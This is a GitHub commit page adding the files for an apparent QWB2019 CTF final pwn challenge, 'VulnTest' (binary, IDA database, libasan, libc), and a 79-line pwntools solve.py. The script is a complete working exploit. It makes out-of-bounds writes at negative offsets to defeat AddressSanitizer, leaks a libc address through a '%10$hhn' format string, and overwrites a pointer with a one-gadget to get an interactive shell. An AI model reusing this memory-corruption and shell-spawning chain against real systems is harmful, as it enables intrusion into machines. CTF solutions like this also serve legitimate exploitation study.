Commit 33346aa

committed

pwn asan

1 parent c3a2555 commit 33346aaCopy full SHA for 33346aa

File tree

5 files changed

+79

-0

lines changed

QWB2019_final_VulnTest

5 files changed

+79

-0

lines changed

`‎QWB2019_final_VulnTest/VulnTest‎`

67.6 KB

Binary file not shown.

`‎QWB2019_final_VulnTest/VulnTest.i64‎`

805 KB

Binary file not shown.

`‎QWB2019_final_VulnTest/libasan.so.4‎`

1.34 MB

Binary file not shown.

`‎QWB2019_final_VulnTest/libc-2.27.so‎`

1.94 MB

Binary file not shown.

`‎QWB2019_final_VulnTest/solve.py‎`

Lines changed: 79 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,79 @@`
	`1`	`+from pwn import *`
	`2`	`+import sys`
	`3`	`+`
	`4`	`+context.arch = 'amd64'`
	`5`	`+context.log_level = 'critical'`
	`6`	`+`
	`7`	`+elf = ELF('./VulnTest')`
	`8`	`+`
	`9`	`+local = True`
	`10`	`+#local = False`
	`11`	`+`
	`12`	`+def exploit():`
	`13`	`+ with process(elf.path, env={"LD_PRELOAD":"./libasan.so.4"}) as p:`
	`14`	`+ # with remote("127.0.0.1", 9999) as p:`
	`15`	`+ # p = remote('127.0.0.1', 1337)`
	`16`	`+`
	`17`	`+ # raw_input()`
	`18`	`+ # Test 2`
	`19`	`+ p.recvuntil('>> ')`
	`20`	`+ p.sendline('2')`
	`21`	`+`
	`22`	`+ #for i in xrange(8):`
	`23`	`+ # p.recvuntil('>> ')`
	`24`	`+ # p.sendline('1')`
	`25`	`+ # p.recvuntil(':')`
	`26`	`+ # p.sendline(str(-64+i))`
	`27`	`+ # p.recvuntil('overflow!')`
	`28`	`+ # p.send('\n')`
	`29`	`+`
	`30`	`+ p.recvuntil('>> ')`
	`31`	`+ p.sendline('1')`
	`32`	`+ p.recvuntil(':')`
	`33`	`+ p.sendline('-64')`
	`34`	`+ p.recvuntil('overflow!')`
	`35`	`+ p.send('\xfe' * 13 + '0円')`
	`36`	`+`
	`37`	`+ p.recvuntil('>> ')`
	`38`	`+ p.sendline('1')`
	`39`	`+ p.recvuntil(':')`
	`40`	`+ p.sendline('-136')`
	`41`	`+ p.recvuntil('overflow!')`
	`42`	`+ p.send('\x80' + '0円')`
	`43`	`+`
	`44`	`+ p.recvuntil('>> ')`
	`45`	`+ p.sendline('1')`
	`46`	`+ p.recvuntil(':')`
	`47`	`+ p.sendline('-152')`
	`48`	`+ p.recvuntil('overflow!')`
	`49`	`+ p.send('\xe6' + '0円')`
	`50`	`+ # p.send('AAAA' + '0円')`
	`51`	`+`
	`52`	`+ p.recvuntil('>> ')`
	`53`	`+ p.sendline('1')`
	`54`	`+ p.recvuntil(':')`
	`55`	`+ p.send('%10$hhn')`
	`56`	`+ p.recvuntil('>> ')`
	`57`	`+ p.sendline('2')`
	`58`	`+`
	`59`	`+ p.recvuntil('!\n')`
	`60`	`+ p.recv(32)`
	`61`	`+ libc = u64(p.recv(8)) - 0x3eb780`
	`62`	`+ magic = libc + 0x4f322`
	`63`	`+ # print hex(libc)`
	`64`	`+`
	`65`	`+ p.recvuntil('>> ')`
	`66`	`+ p.sendline('2')`
	`67`	`+`
	`68`	`+ p.recvuntil('>> ')`
	`69`	`+ p.sendline('1')`
	`70`	`+ p.recvuntil(':')`
	`71`	`+ p.sendline('-152')`
	`72`	`+ p.recvuntil('overflow!')`
	`73`	`+ p.send(p64(magic).replace('0円', '') + '0円')`
	`74`	`+`
	`75`	`+`
	`76`	`+ p.sendline("cd /home/wang/success")`
	`77`	`+ p.interactive()`
	`78`	`+`
	`79`	`+exploit()`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit 33346aa

File tree

5 files changed

5 files changed

`‎QWB2019_final_VulnTest/VulnTest‎`

`‎QWB2019_final_VulnTest/VulnTest.i64‎`

`‎QWB2019_final_VulnTest/libasan.so.4‎`

`‎QWB2019_final_VulnTest/libc-2.27.so‎`

`‎QWB2019_final_VulnTest/solve.py‎`

0 commit comments